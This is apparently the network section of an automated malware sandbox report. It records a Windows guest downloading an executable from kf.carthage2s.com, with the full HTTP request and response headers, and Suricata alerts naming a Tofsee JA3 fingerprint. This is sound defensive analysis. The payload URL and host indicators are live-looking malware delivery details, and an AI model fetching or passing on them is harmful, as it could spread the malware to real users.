Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
kf.carthage2s.com | 41.231.5.212 |
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://kf.carthage2s.com/XtmkLSmftnsk6TlB.exe
REQUEST
RESPONSE
BODY
GET /XtmkLSmftnsk6TlB.exe HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: kf.carthage2s.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 09 Jun 2021 11:42:21 GMT
Accept-Ranges: bytes
ETag: "84d6f82245dd71:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Fri, 11 Jun 2021 08:18:23 GMT
Content-Length: 1206272
GET
200
http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
REQUEST
RESPONSE
BODY
GET /IE9CompatViewList.xml HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: ie9cvlist.ie.microsoft.com
If-Modified-Since: Thu, 21 Nov 2019 19:37:08 GMT
If-None-Match: 0x8D76EBA32AF0BC3
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Age: 10313
Cache-Control: max-age=21600
Content-MD5: Ho7x5OFxPmXuon/IucKh7g==
Content-Type: text/xml
Date: Fri, 11 Jun 2021 08:19:22 GMT
Etag: 0x8D90364ECB23BC5
Last-Modified: Mon, 19 Apr 2021 18:57:05 GMT
Server: ECAcc (tka/897A)
Vary: Accept-Encoding
X-Cache: HIT
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: 3e839048-501e-0076-5482-5e69be000000
x-ms-version: 2009-09-19
Content-Length: 13706
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 41.231.5.212:80 -> 192.168.56.101:49203 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 117.18.232.200:443 -> 192.168.56.101:49214 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.101:49212 -> 117.18.232.200:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49213 -> 117.18.232.200:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts